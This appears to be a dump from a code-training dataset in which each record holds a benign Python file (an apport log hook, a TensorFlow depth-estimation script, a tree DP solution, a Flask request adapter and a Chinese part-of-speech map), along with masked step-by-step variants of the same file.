'do_state_display error!'\n try:\n do_pump_toggle()\n except Exception, e:\n print e\n print 'do_pump_toggle error!'\n print 'done with cycle, now waiting %s' % datetime.datetime.today()\n time.sleep(interval)\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# apport hook for oem-config; adds log file
import os.path
def add_info(report):
if os.path.exists('/var/log/oem-config.log'):
report['OemConfigLog'] = ('/var/log/oem-config.log',)
|
normal
|
{
"blob_id": "74b1cdcb1aaf6cde7e8ce3eeb73cd82689719b00",
"index": 6404,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef add_info(report):\n if os.path.exists('/var/log/oem-config.log'):\n report['OemConfigLog'] = '/var/log/oem-config.log',\n",
"step-3": "import os.path\n\n\ndef add_info(report):\n if os.path.exists('/var/log/oem-config.log'):\n report['OemConfigLog'] = '/var/log/oem-config.log',\n",
"step-4": "# apport hook for oem-config; adds log file\n\nimport os.path\n\ndef add_info(report):\n if os.path.exists('/var/log/oem-config.log'):\n report['OemConfigLog'] = ('/var/log/oem-config.log',)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
'''
"MAIN" module
All operations are added to the defaultgraph.
Network functions are found in module network_functions_2
Display graph in tensorboard by opening a new terminal and write "tensorboard --logdir=tensorbaord/debug/01/" where
the last number depends on which directory the current graph is saved in (see line 35 in this module where the
FileWriter is created). After this, open the local webpage displayed in the terminal (looks something like http://OSCAR-LENOVO-LAPTOP:6006)
but with your own username.
'''
import network_functions_2_elin as nf
import tensorflow as tf
import numpy as np
import read_data as rd
with tf.name_scope("input_data"):
# import images
(iterate_data, sub_images, sub_depths, sub_images_placeholder, sub_depths_placeholder) = rd.read_debug_data()
sub_images_coarse = tf.constant(value = np.moveaxis(sub_images[0:223, 0:303, :, :], -1, 0), dtype = tf.float32, name = "images_coarse")
sub_images_fine = tf.constant(value = np.moveaxis(sub_images[0:227, 0:303, :, :], -1, 0), dtype = tf.float32, name = "images_fine")
depthmaps_groundtruth = tf.constant(value = np.moveaxis(sub_depths[0:55, 0:74, :], -1, 0), dtype = tf.float32, name = "depthmaps_groundtruth")
sub_images_coarse = tf.constant(value = sub_images[:,0:223, 0:303, :], dtype = tf.float32, name = "images_coarse")
sub_images_fine = tf.constant(value = sub_images[:, 0:227, 0:303, :], dtype = tf.float32, name = "images_fine")
depthmaps_groundtruth = tf.constant(value = np.moveaxis(sub_depths[:,0:55, 0:74, :], -1, 0), dtype = tf.float32, name = "depthmaps_groundtruth")
# print sample images to tensorboard
tf.summary.image(name = "images_coarse", tensor = sub_images_coarse, max_outputs = 1)
tf.summary.image(name = "images_fine", tensor = sub_images_fine, max_outputs = 1)
# define coarse and fine networks
coarse_depthmap_predictions = nf.get_coarse_network(input_placeholder = sub_images_coarse)
fine_depthmap_predictions = nf.get_fine_network(input_placeholder = sub_images_fine, coarse_prediction = coarse_depthmap_predictions)
# Session: tensorflow calculates all values using the input
with tf.Session() as sess:
# tensorboard writer CHANGE THE DIR NUMBER EVERY RUN (27 -> 28 -> 29 etc.)
# tensorboard/* in .gitignore
writer = tf.summary.FileWriter("./tensorboard/debug/07", sess.graph)
sess.run(tf.global_variables_initializer())
sess.run(fine_depthmap_predictions)
# compute cost function
fine_cost = nf.get_cost_function(depthmaps_predicted = fine_depthmap_predictions,
depthmaps_groundtruth = depthmaps_groundtruth)
# calculate and run optimizer
optimizer_fine = nf.get_fine_optimizer(fine_cost)
sess.run(tf.global_variables_initializer())
sess.run(optimizer_fine)
# this code makes sure that all info gets written to tensorboard
merged_summary = sess.run(tf.summary.merge_all())
writer.add_summary(merged_summary)
writer.close()
|
normal
|
{
"blob_id": "8a2cf1d550a593beae579104413b424e007d511f",
"index": 9048,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith tf.name_scope('input_data'):\n (iterate_data, sub_images, sub_depths, sub_images_placeholder,\n sub_depths_placeholder) = rd.read_debug_data()\n sub_images_coarse = tf.constant(value=np.moveaxis(sub_images[0:223, 0:\n 303, :, :], -1, 0), dtype=tf.float32, name='images_coarse')\n sub_images_fine = tf.constant(value=np.moveaxis(sub_images[0:227, 0:303,\n :, :], -1, 0), dtype=tf.float32, name='images_fine')\n depthmaps_groundtruth = tf.constant(value=np.moveaxis(sub_depths[0:55, \n 0:74, :], -1, 0), dtype=tf.float32, name='depthmaps_groundtruth')\n sub_images_coarse = tf.constant(value=sub_images[:, 0:223, 0:303, :],\n dtype=tf.float32, name='images_coarse')\n sub_images_fine = tf.constant(value=sub_images[:, 0:227, 0:303, :],\n dtype=tf.float32, name='images_fine')\n depthmaps_groundtruth = tf.constant(value=np.moveaxis(sub_depths[:, 0:\n 55, 0:74, :], -1, 0), dtype=tf.float32, name='depthmaps_groundtruth')\n tf.summary.image(name='images_coarse', tensor=sub_images_coarse,\n max_outputs=1)\n tf.summary.image(name='images_fine', tensor=sub_images_fine, max_outputs=1)\n<mask token>\nwith tf.Session() as sess:\n writer = tf.summary.FileWriter('./tensorboard/debug/07', sess.graph)\n sess.run(tf.global_variables_initializer())\n sess.run(fine_depthmap_predictions)\n fine_cost = nf.get_cost_function(depthmaps_predicted=\n fine_depthmap_predictions, depthmaps_groundtruth=depthmaps_groundtruth)\n optimizer_fine = nf.get_fine_optimizer(fine_cost)\n sess.run(tf.global_variables_initializer())\n sess.run(optimizer_fine)\n merged_summary = sess.run(tf.summary.merge_all())\n writer.add_summary(merged_summary)\n writer.close()\n",
"step-3": "<mask token>\nwith tf.name_scope('input_data'):\n (iterate_data, sub_images, sub_depths, sub_images_placeholder,\n sub_depths_placeholder) = rd.read_debug_data()\n sub_images_coarse = tf.constant(value=np.moveaxis(sub_images[0:223, 0:\n 303, :, :], -1, 0), dtype=tf.float32, name='images_coarse')\n sub_images_fine = tf.constant(value=np.moveaxis(sub_images[0:227, 0:303,\n :, :], -1, 0), dtype=tf.float32, name='images_fine')\n depthmaps_groundtruth = tf.constant(value=np.moveaxis(sub_depths[0:55, \n 0:74, :], -1, 0), dtype=tf.float32, name='depthmaps_groundtruth')\n sub_images_coarse = tf.constant(value=sub_images[:, 0:223, 0:303, :],\n dtype=tf.float32, name='images_coarse')\n sub_images_fine = tf.constant(value=sub_images[:, 0:227, 0:303, :],\n dtype=tf.float32, name='images_fine')\n depthmaps_groundtruth = tf.constant(value=np.moveaxis(sub_depths[:, 0:\n 55, 0:74, :], -1, 0), dtype=tf.float32, name='depthmaps_groundtruth')\n tf.summary.image(name='images_coarse', tensor=sub_images_coarse,\n max_outputs=1)\n tf.summary.image(name='images_fine', tensor=sub_images_fine, max_outputs=1)\ncoarse_depthmap_predictions = nf.get_coarse_network(input_placeholder=\n sub_images_coarse)\nfine_depthmap_predictions = nf.get_fine_network(input_placeholder=\n sub_images_fine, coarse_prediction=coarse_depthmap_predictions)\nwith tf.Session() as sess:\n writer = tf.summary.FileWriter('./tensorboard/debug/07', sess.graph)\n sess.run(tf.global_variables_initializer())\n sess.run(fine_depthmap_predictions)\n fine_cost = nf.get_cost_function(depthmaps_predicted=\n fine_depthmap_predictions, depthmaps_groundtruth=depthmaps_groundtruth)\n optimizer_fine = nf.get_fine_optimizer(fine_cost)\n sess.run(tf.global_variables_initializer())\n sess.run(optimizer_fine)\n merged_summary = sess.run(tf.summary.merge_all())\n writer.add_summary(merged_summary)\n writer.close()\n",
"step-4": "<mask token>\nimport network_functions_2_elin as nf\nimport tensorflow as tf\nimport numpy as np\nimport read_data as rd\nwith tf.name_scope('input_data'):\n (iterate_data, sub_images, sub_depths, sub_images_placeholder,\n sub_depths_placeholder) = rd.read_debug_data()\n sub_images_coarse = tf.constant(value=np.moveaxis(sub_images[0:223, 0:\n 303, :, :], -1, 0), dtype=tf.float32, name='images_coarse')\n sub_images_fine = tf.constant(value=np.moveaxis(sub_images[0:227, 0:303,\n :, :], -1, 0), dtype=tf.float32, name='images_fine')\n depthmaps_groundtruth = tf.constant(value=np.moveaxis(sub_depths[0:55, \n 0:74, :], -1, 0), dtype=tf.float32, name='depthmaps_groundtruth')\n sub_images_coarse = tf.constant(value=sub_images[:, 0:223, 0:303, :],\n dtype=tf.float32, name='images_coarse')\n sub_images_fine = tf.constant(value=sub_images[:, 0:227, 0:303, :],\n dtype=tf.float32, name='images_fine')\n depthmaps_groundtruth = tf.constant(value=np.moveaxis(sub_depths[:, 0:\n 55, 0:74, :], -1, 0), dtype=tf.float32, name='depthmaps_groundtruth')\n tf.summary.image(name='images_coarse', tensor=sub_images_coarse,\n max_outputs=1)\n tf.summary.image(name='images_fine', tensor=sub_images_fine, max_outputs=1)\ncoarse_depthmap_predictions = nf.get_coarse_network(input_placeholder=\n sub_images_coarse)\nfine_depthmap_predictions = nf.get_fine_network(input_placeholder=\n sub_images_fine, coarse_prediction=coarse_depthmap_predictions)\nwith tf.Session() as sess:\n writer = tf.summary.FileWriter('./tensorboard/debug/07', sess.graph)\n sess.run(tf.global_variables_initializer())\n sess.run(fine_depthmap_predictions)\n fine_cost = nf.get_cost_function(depthmaps_predicted=\n fine_depthmap_predictions, depthmaps_groundtruth=depthmaps_groundtruth)\n optimizer_fine = nf.get_fine_optimizer(fine_cost)\n sess.run(tf.global_variables_initializer())\n sess.run(optimizer_fine)\n merged_summary = sess.run(tf.summary.merge_all())\n writer.add_summary(merged_summary)\n writer.close()\n",
"step-5": "'''\n\"MAIN\" module \nAll operations are added to the defaultgraph.\nNetwork functions are found in module network_functions_2 \nDisplay graph in tensorboard by opening a new terminal and write \"tensorboard --logdir=tensorbaord/debug/01/\" where \nthe last number depends on which directory the current graph is saved in (see line 35 in this module where the \nFileWriter is created). After this, open the local webpage displayed in the terminal (looks something like http://OSCAR-LENOVO-LAPTOP:6006) \nbut with your own username. \n'''\n\nimport network_functions_2_elin as nf\nimport tensorflow as tf\nimport numpy as np\nimport read_data as rd\n\n\nwith tf.name_scope(\"input_data\"):\n\t# import images \n\t(iterate_data, sub_images, sub_depths, sub_images_placeholder, sub_depths_placeholder) = rd.read_debug_data()\t\n\tsub_images_coarse = tf.constant(value = np.moveaxis(sub_images[0:223, 0:303, :, :], -1, 0), dtype = tf.float32, name = \"images_coarse\") \n\tsub_images_fine = tf.constant(value = np.moveaxis(sub_images[0:227, 0:303, :, :], -1, 0), dtype = tf.float32, name = \"images_fine\") \n\tdepthmaps_groundtruth = tf.constant(value = np.moveaxis(sub_depths[0:55, 0:74, :], -1, 0), dtype = tf.float32, name = \"depthmaps_groundtruth\")\n\n\tsub_images_coarse = tf.constant(value = sub_images[:,0:223, 0:303, :], dtype = tf.float32, name = \"images_coarse\") \n\tsub_images_fine = tf.constant(value = sub_images[:, 0:227, 0:303, :], dtype = tf.float32, name = \"images_fine\") \n\tdepthmaps_groundtruth = tf.constant(value = np.moveaxis(sub_depths[:,0:55, 0:74, :], -1, 0), dtype = tf.float32, name = \"depthmaps_groundtruth\")\n\t\n\t# print sample images to tensorboard \n\ttf.summary.image(name = \"images_coarse\", tensor = sub_images_coarse, max_outputs = 1)\n\ttf.summary.image(name = \"images_fine\", tensor = sub_images_fine, max_outputs = 1)\n\n\n# define coarse and fine networks \ncoarse_depthmap_predictions = nf.get_coarse_network(input_placeholder = sub_images_coarse)\nfine_depthmap_predictions = nf.get_fine_network(input_placeholder = sub_images_fine, coarse_prediction = coarse_depthmap_predictions)\n\n\n# Session: tensorflow calculates all values using the input \nwith tf.Session() as sess:\n\n\t# tensorboard writer CHANGE THE DIR NUMBER EVERY RUN (27 -> 28 -> 29 etc.)\n\t# tensorboard/* in .gitignore \n\twriter = tf.summary.FileWriter(\"./tensorboard/debug/07\", sess.graph) \t\n\n\tsess.run(tf.global_variables_initializer())\t\n\t\t\t\t\t\t\t \n\tsess.run(fine_depthmap_predictions)\t\t\t\t\t\t\t\t\t\t\n\n\t# compute cost function \n\tfine_cost = nf.get_cost_function(depthmaps_predicted = fine_depthmap_predictions, \n\t\t\t\t\t\t\t\t\tdepthmaps_groundtruth = depthmaps_groundtruth)\n\n\t# calculate and run optimizer \n\toptimizer_fine = nf.get_fine_optimizer(fine_cost)\t\n\tsess.run(tf.global_variables_initializer())\t\t\t\n\tsess.run(optimizer_fine)\n\n\t# this code makes sure that all info gets written to tensorboard \n\tmerged_summary = sess.run(tf.summary.merge_all())\n\twriter.add_summary(merged_summary)\n\twriter.close()\n\n\n\t\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import sys
from collections import defaultdict
sys.setrecursionlimit(1200)
def dfs(G, v, prev):
t = []
s = 0
for x in G[v]:
if x == prev: continue
tmp = dfs(G, x, v)
s += tmp[1]
t.append(tmp[0] - tmp[1])
t.sort()
t = t[:2]
if len(t) < 2:
return (s, s+1)
return (s + t[0] + t[1], s+1)
def solve():
read_ints = lambda: map(int, sys.stdin.readline().split())
n = int(sys.stdin.readline())
G = defaultdict(list)
for _ in xrange(n-1):
x, y = read_ints()
x, y = x-1, y-1
G[x].append(y)
G[y].append(x)
return min(dfs(G, i, -1)[0] for i in xrange(n))
for t in xrange(int(sys.stdin.readline())):
print "Case #%d:" % (t + 1),
print solve()
|
normal
|
{
"blob_id": "efa06d929e76a255afd9923b5340252c291a325c",
"index": 3615,
"step-1": "import sys\nfrom collections import defaultdict\nsys.setrecursionlimit(1200)\n\ndef dfs(G, v, prev):\n t = []\n s = 0\n for x in G[v]:\n if x == prev: continue\n tmp = dfs(G, x, v)\n s += tmp[1]\n t.append(tmp[0] - tmp[1])\n t.sort()\n t = t[:2]\n if len(t) < 2:\n return (s, s+1)\n return (s + t[0] + t[1], s+1)\n\ndef solve():\n read_ints = lambda: map(int, sys.stdin.readline().split())\n n = int(sys.stdin.readline())\n G = defaultdict(list)\n for _ in xrange(n-1):\n x, y = read_ints()\n x, y = x-1, y-1\n G[x].append(y)\n G[y].append(x)\n return min(dfs(G, i, -1)[0] for i in xrange(n))\n\nfor t in xrange(int(sys.stdin.readline())):\n print \"Case #%d:\" % (t + 1),\n print solve()\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from typing import Type
from sqlalchemy.exc import IntegrityError
from src.main.interface import RouteInterface as Route
from src.presenters.helpers import HttpRequest, HttpResponse
from src.presenters.errors import HttpErrors
def flask_adapter(request: any, api_route: Type[Route]) -> any:
"""Adapter pattern for Flask
:param - Flask Request
:api_route: Composite Routes
"""
try:
query_string_params = request.args.to_dict()
if "account_id" in query_string_params.keys():
body = None
query_string_params["account_id"] = int(query_string_params["account_id"])
else:
body = request.json
except:
http_error = HttpErrors.error_400()
return HttpResponse(
status_code=http_error["status_code"], body=http_error["body"]
)
http_request = HttpRequest(
header=request.headers, body=body, query=query_string_params
)
try:
response = api_route.route(http_request)
except IntegrityError:
http_error = HttpErrors.error_400()
return HttpResponse(
status_code=http_error["status_code"], body=http_error["body"]
)
except Exception as exc:
print(exc)
http_error = HttpErrors.error_500()
return HttpResponse(
status_code=http_error["status_code"], body=http_error["body"]
)
return response
|
normal
|
{
"blob_id": "3212bb7df990ad7d075b8ca49a99e1072eab2a90",
"index": 595,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef flask_adapter(request: any, api_route: Type[Route]) ->any:\n \"\"\"Adapter pattern for Flask\n :param - Flask Request\n :api_route: Composite Routes\n \"\"\"\n try:\n query_string_params = request.args.to_dict()\n if 'account_id' in query_string_params.keys():\n body = None\n query_string_params['account_id'] = int(query_string_params[\n 'account_id'])\n else:\n body = request.json\n except:\n http_error = HttpErrors.error_400()\n return HttpResponse(status_code=http_error['status_code'], body=\n http_error['body'])\n http_request = HttpRequest(header=request.headers, body=body, query=\n query_string_params)\n try:\n response = api_route.route(http_request)\n except IntegrityError:\n http_error = HttpErrors.error_400()\n return HttpResponse(status_code=http_error['status_code'], body=\n http_error['body'])\n except Exception as exc:\n print(exc)\n http_error = HttpErrors.error_500()\n return HttpResponse(status_code=http_error['status_code'], body=\n http_error['body'])\n return response\n",
"step-3": "from typing import Type\nfrom sqlalchemy.exc import IntegrityError\nfrom src.main.interface import RouteInterface as Route\nfrom src.presenters.helpers import HttpRequest, HttpResponse\nfrom src.presenters.errors import HttpErrors\n\n\ndef flask_adapter(request: any, api_route: Type[Route]) ->any:\n \"\"\"Adapter pattern for Flask\n :param - Flask Request\n :api_route: Composite Routes\n \"\"\"\n try:\n query_string_params = request.args.to_dict()\n if 'account_id' in query_string_params.keys():\n body = None\n query_string_params['account_id'] = int(query_string_params[\n 'account_id'])\n else:\n body = request.json\n except:\n http_error = HttpErrors.error_400()\n return HttpResponse(status_code=http_error['status_code'], body=\n http_error['body'])\n http_request = HttpRequest(header=request.headers, body=body, query=\n query_string_params)\n try:\n response = api_route.route(http_request)\n except IntegrityError:\n http_error = HttpErrors.error_400()\n return HttpResponse(status_code=http_error['status_code'], body=\n http_error['body'])\n except Exception as exc:\n print(exc)\n http_error = HttpErrors.error_500()\n return HttpResponse(status_code=http_error['status_code'], body=\n http_error['body'])\n return response\n",
"step-4": "from typing import Type\nfrom sqlalchemy.exc import IntegrityError\nfrom src.main.interface import RouteInterface as Route\nfrom src.presenters.helpers import HttpRequest, HttpResponse\nfrom src.presenters.errors import HttpErrors\n\n\ndef flask_adapter(request: any, api_route: Type[Route]) -> any:\n \"\"\"Adapter pattern for Flask\n :param - Flask Request\n :api_route: Composite Routes\n \"\"\"\n\n try:\n query_string_params = request.args.to_dict()\n\n if \"account_id\" in query_string_params.keys():\n body = None\n query_string_params[\"account_id\"] = int(query_string_params[\"account_id\"])\n else:\n body = request.json\n\n except:\n http_error = HttpErrors.error_400()\n return HttpResponse(\n status_code=http_error[\"status_code\"], body=http_error[\"body\"]\n )\n\n http_request = HttpRequest(\n header=request.headers, body=body, query=query_string_params\n )\n\n try:\n response = api_route.route(http_request)\n except IntegrityError:\n http_error = HttpErrors.error_400()\n return HttpResponse(\n status_code=http_error[\"status_code\"], body=http_error[\"body\"]\n )\n except Exception as exc:\n print(exc)\n http_error = HttpErrors.error_500()\n return HttpResponse(\n status_code=http_error[\"status_code\"], body=http_error[\"body\"]\n )\n\n return response\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# -*- coding: utf-8 -*-
"""Part of speech mapping constants and functions for NLPIR/ICTCLAS.
This module is used by :mod:`pynlpir` to format segmented words for output.
"""
import logging
logger = logging.getLogger("pynlpir.pos_map")
#: A dictionary that maps part of speech codes returned by NLPIR to
#: human-readable names (English and Chinese).
POS_MAP = {
"n": (
"名词",
"noun",
{
"nr": (
"人名",
"personal name",
{
"nr1": ("汉语姓氏", "Chinese surname"),
"nr2": ("汉语名字", "Chinese given name"),
"nrj": ("日语人名", "Japanese personal name"),
"nrf": ("音译人名", "transcribed personal name"),
},
),
"ns": (
"地名",
"toponym",
{
"nsf": ("音译地名", "transcribed toponym"),
},
),
"nt": ("机构团体名", "organization/group name"),
"nz": ("其它专名", "other proper noun"),
"nl": ("名词性惯用语", "noun phrase"),
"ng": ("名词性语素", "noun morpheme"),
},
),
"t": (
"时间词",
"time word",
{
"tg": ("时间词性语素", "time morpheme"),
},
),
"s": ("处所词", "locative word"),
"f": ("方位词", "noun of locality"),
"v": (
"动词",
"verb",
{
"vd": ("副动词", "auxiliary verb"),
"vn": ("名动词", "noun-verb"),
"vshi": ('动词"是"', "verb 是"),
"vyou": ('动词"有"', "verb 有"),
"vf": ("趋向动词", "directional verb"),
"vx": ("行事动词", "performative verb"),
"vi": ("不及物动词", "intransitive verb"),
"vl": ("动词性惯用语", "verb phrase"),
"vg": ("动词性语素", "verb morpheme"),
},
),
"a": (
"形容词",
"adjective",
{
"ad": ("副形词", "auxiliary adjective"),
"an": ("名形词", "noun-adjective"),
"ag": ("形容词性语素", "adjective morpheme"),
"al": ("形容词性惯用语", "adjective phrase"),
},
),
"b": (
"区别词",
"distinguishing word",
{
"bl": ("区别词性惯用语", "distinguishing phrase"),
},
),
"z": ("状态词", "status word"),
"r": (
"代词",
"pronoun",
{
"rr": ("人称代词", "personal pronoun"),
"rz": (
"指示代词",
"demonstrative pronoun",
{
"rzt": ("时间指示代词", "temporal demonstrative pronoun"),
"rzs": ("处所指示代词", "locative demonstrative pronoun"),
"rzv": ("谓词性指示代词", "predicate demonstrative pronoun"),
},
),
"ry": (
"疑问代词",
"interrogative pronoun",
{
"ryt": ("时间疑问代词", "temporal interrogative pronoun"),
"rys": ("处所疑问代词", "locative interrogative pronoun"),
"ryv": ("谓词性疑问代词", "predicate interrogative pronoun"),
},
),
"rg": ("代词性语素", "pronoun morpheme"),
},
),
"m": (
"数词",
"numeral",
{
"mq": ("数量词", "numeral-plus-classifier compound"),
"mg": ("干支", "zodiac"),
},
),
"q": (
"量词",
"classifier",
{
"qv": ("动量词", "verbal classifier"),
"qt": ("时量词", "temporal classifier"),
},
),
"d": ("副词", "adverb"),
"p": (
"介词",
"preposition",
{
"pba": ("介词“把”", "preposition 把"),
"pbei": ("介词“被”", "preposition 被"),
},
),
"c": (
"连词",
"conjunction",
{
"cc": ("并列连词", "coordinating conjunction"),
},
),
"u": (
"助词",
"particle",
{
"uzhe": ("着", "particle 着"),
"ule": ("了/喽", "particle 了/喽"),
"uguo": ("过", "particle 过"),
"ude1": ("的/底", "particle 的/底"),
"ude2": ("地", "particle 地"),
"ude3": ("得", "particle 得"),
"usuo": ("所", "particle 所"),
"udeng": ("等/等等/云云", "particle 等/等等/云云"),
"uyy": ("一样/一般/似的/般", "particle 一样/一般/似的/般"),
"udh": ("的话", "particle 的话"),
"uls": ("来讲/来说/而言/说来", "particle 来讲/来说/而言/说来"),
"uzhi": ("之", "particle 之"),
"ulian": ("连", "particle 连"),
},
),
"e": ("叹词", "interjection"),
"y": ("语气词", "modal particle"),
"o": ("拟声词", "onomatopoeia"),
"h": ("前缀", "prefix"),
"k": ("后缀", "suffix"),
"x": (
"字符串",
"string",
{
"xe": ("Email字符串", "email address"),
"xs": ("微博会话分隔符", "hashtag"),
"xm": ("表情符合", "emoticon"),
"xu": ("网址URL", "URL"),
"xx": ("非语素字", "non-morpheme character"),
},
),
"w": (
"标点符号",
"punctuation mark",
{
"wkz": ("左括号", "left parenthesis/bracket"),
"wky": ("右括号", "right parenthesis/bracket"),
"wyz": ("左引号", "left quotation mark"),
"wyy": ("右引号", "right quotation mark"),
"wj": ("句号", "period"),
"ww": ("问号", "question mark"),
"wt": ("叹号", "exclamation mark"),
"wd": ("逗号", "comma"),
"wf": ("分号", "semicolon"),
"wn": ("顿号", "enumeration comma"),
"wm": ("冒号", "colon"),
"ws": ("省略号", "ellipsis"),
"wp": ("破折号", "dash"),
"wb": ("百分号千分号", "percent/per mille sign"),
"wh": ("单位符号", "unit of measure sign"),
},
),
"g": ("复合语", "multiword expression"),
"j": ("略语", "abbreviation"),
}
def _get_pos_name(pos_code, names="parent", english=True, pos_map=POS_MAP):
"""Gets the part of speech name for *pos_code*."""
if names not in ("parent", "child", "all", "raw"):
raise ValueError(
"names must be one of 'parent', 'child', 'all', or "
"'raw'; not '{0}'".format(names)
)
logger.debug(
"Getting {0} POS name for '{1}' formatted as '{2}'.".format(
"English" if english else "Chinese", pos_code, names
)
)
if names == "raw":
return pos_code
pos_code = pos_code.lower() # Issue #10
for i in range(1, len(pos_code) + 1):
try:
pos_key = pos_code[0:i]
pos_entry = pos_map[pos_key]
break
except KeyError:
if i == len(pos_code):
logger.warning("part of speech not recognized: '{0}'".format(pos_code))
return None # Issue #20
pos = (pos_entry[1 if english else 0],)
if names == "parent":
logger.debug("Part of speech name found: '{0}'".format(pos[0]))
return pos[0]
if len(pos_entry) == 3 and pos_key != pos_code:
sub_map = pos_entry[2]
logger.debug(
"Found parent part of speech name '{0}'. Descending to "
"look for child name for '{1}'".format(pos_entry[1], pos_code)
)
sub_pos = _get_pos_name(pos_code, names, english, sub_map)
if names == "all":
# sub_pos can be None sometimes (e.g. for a word '甲')
pos = pos + sub_pos if sub_pos else pos
else:
pos = (sub_pos,)
name = pos if names == "all" else pos[-1]
logger.debug("Part of speech name found: '{0}'".format(name))
return name
def get_pos_name(code, name="parent", english=True, pos_tags=POS_MAP):
"""Gets the part of speech name for *code*.
:param str code: The part of speech code to lookup, e.g. ``'nsf'``.
:param str name: Which part of speech name to include in the output. Must
be one of ``'parent'``, ``'child'``, ``'all'``, or ``'raw'``.
Defaults to ``'parent'``. ``'parent'`` indicates that only the most
generic name should be used, e.g. ``'noun'`` for ``'nsf'``.
``'child'`` indicates that the most specific name should be used, e.g.
``'transcribed toponym'`` for ``'nsf'``. ``'all'`` indicates that all
names should be used, e.g. ``('noun', 'toponym',
'transcribed toponym')`` for ``'nsf'``. ``'raw'`` indicates that the
part of speech code is not transformed at all.
:param bool english: Whether to return an English or Chinese name.
:param dict pos_tags: Custom part of speech tags to use.
:returns: ``str`` if *name* is ``'parent'`` or ``'child'``.
``tuple`` if *name* is ``'all'``.
"""
return _get_pos_name(code, name, english, pos_tags)
|
normal
|
{
"blob_id": "093b2afef7cdfb7070eb5e94e84624afe495db66",
"index": 1948,
"step-1": "<mask token>\n\n\ndef get_pos_name(code, name='parent', english=True, pos_tags=POS_MAP):\n \"\"\"Gets the part of speech name for *code*.\n\n :param str code: The part of speech code to lookup, e.g. ``'nsf'``.\n :param str name: Which part of speech name to include in the output. Must\n be one of ``'parent'``, ``'child'``, ``'all'``, or ``'raw'``.\n Defaults to ``'parent'``. ``'parent'`` indicates that only the most\n generic name should be used, e.g. ``'noun'`` for ``'nsf'``.\n ``'child'`` indicates that the most specific name should be used, e.g.\n ``'transcribed toponym'`` for ``'nsf'``. ``'all'`` indicates that all\n names should be used, e.g. ``('noun', 'toponym',\n 'transcribed toponym')`` for ``'nsf'``. ``'raw'`` indicates that the\n part of speech code is not transformed at all.\n :param bool english: Whether to return an English or Chinese name.\n :param dict pos_tags: Custom part of speech tags to use.\n :returns: ``str`` if *name* is ``'parent'`` or ``'child'``.\n ``tuple`` if *name* is ``'all'``.\n\n \"\"\"\n return _get_pos_name(code, name, english, pos_tags)\n",
"step-2": "<mask token>\n\n\ndef _get_pos_name(pos_code, names='parent', english=True, pos_map=POS_MAP):\n \"\"\"Gets the part of speech name for *pos_code*.\"\"\"\n if names not in ('parent', 'child', 'all', 'raw'):\n raise ValueError(\n \"names must be one of 'parent', 'child', 'all', or 'raw'; not '{0}'\"\n .format(names))\n logger.debug(\"Getting {0} POS name for '{1}' formatted as '{2}'.\".\n format('English' if english else 'Chinese', pos_code, names))\n if names == 'raw':\n return pos_code\n pos_code = pos_code.lower()\n for i in range(1, len(pos_code) + 1):\n try:\n pos_key = pos_code[0:i]\n pos_entry = pos_map[pos_key]\n break\n except KeyError:\n if i == len(pos_code):\n logger.warning(\"part of speech not recognized: '{0}'\".\n format(pos_code))\n return None\n pos = pos_entry[1 if english else 0],\n if names == 'parent':\n logger.debug(\"Part of speech name found: '{0}'\".format(pos[0]))\n return pos[0]\n if len(pos_entry) == 3 and pos_key != pos_code:\n sub_map = pos_entry[2]\n logger.debug(\n \"Found parent part of speech name '{0}'. Descending to look for child name for '{1}'\"\n .format(pos_entry[1], pos_code))\n sub_pos = _get_pos_name(pos_code, names, english, sub_map)\n if names == 'all':\n pos = pos + sub_pos if sub_pos else pos\n else:\n pos = sub_pos,\n name = pos if names == 'all' else pos[-1]\n logger.debug(\"Part of speech name found: '{0}'\".format(name))\n return name\n\n\ndef get_pos_name(code, name='parent', english=True, pos_tags=POS_MAP):\n \"\"\"Gets the part of speech name for *code*.\n\n :param str code: The part of speech code to lookup, e.g. ``'nsf'``.\n :param str name: Which part of speech name to include in the output. Must\n be one of ``'parent'``, ``'child'``, ``'all'``, or ``'raw'``.\n Defaults to ``'parent'``. ``'parent'`` indicates that only the most\n generic name should be used, e.g. ``'noun'`` for ``'nsf'``.\n ``'child'`` indicates that the most specific name should be used, e.g.\n ``'transcribed toponym'`` for ``'nsf'``. ``'all'`` indicates that all\n names should be used, e.g. ``('noun', 'toponym',\n 'transcribed toponym')`` for ``'nsf'``. ``'raw'`` indicates that the\n part of speech code is not transformed at all.\n :param bool english: Whether to return an English or Chinese name.\n :param dict pos_tags: Custom part of speech tags to use.\n :returns: ``str`` if *name* is ``'parent'`` or ``'child'``.\n ``tuple`` if *name* is ``'all'``.\n\n \"\"\"\n return _get_pos_name(code, name, english, pos_tags)\n",
"step-3": "<mask token>\nlogger = logging.getLogger('pynlpir.pos_map')\nPOS_MAP = {'n': ('名词', 'noun', {'nr': ('人名', 'personal name', {'nr1': (\n '汉语姓氏', 'Chinese surname'), 'nr2': ('汉语名字', 'Chinese given name'),\n 'nrj': ('日语人名', 'Japanese personal name'), 'nrf': ('音译人名',\n 'transcribed personal name')}), 'ns': ('地名', 'toponym', {'nsf': ('音译地名',\n 'transcribed toponym')}), 'nt': ('机构团体名', 'organization/group name'),\n 'nz': ('其它专名', 'other proper noun'), 'nl': ('名词性惯用语', 'noun phrase'),\n 'ng': ('名词性语素', 'noun morpheme')}), 't': ('时间词', 'time word', {'tg': (\n '时间词性语素', 'time morpheme')}), 's': ('处所词', 'locative word'), 'f': (\n '方位词', 'noun of locality'), 'v': ('动词', 'verb', {'vd': ('副动词',\n 'auxiliary verb'), 'vn': ('名动词', 'noun-verb'), 'vshi': ('动词\"是\"',\n 'verb 是'), 'vyou': ('动词\"有\"', 'verb 有'), 'vf': ('趋向动词',\n 'directional verb'), 'vx': ('行事动词', 'performative verb'), 'vi': (\n '不及物动词', 'intransitive verb'), 'vl': ('动词性惯用语', 'verb phrase'), 'vg': (\n '动词性语素', 'verb morpheme')}), 'a': ('形容词', 'adjective', {'ad': ('副形词',\n 'auxiliary adjective'), 'an': 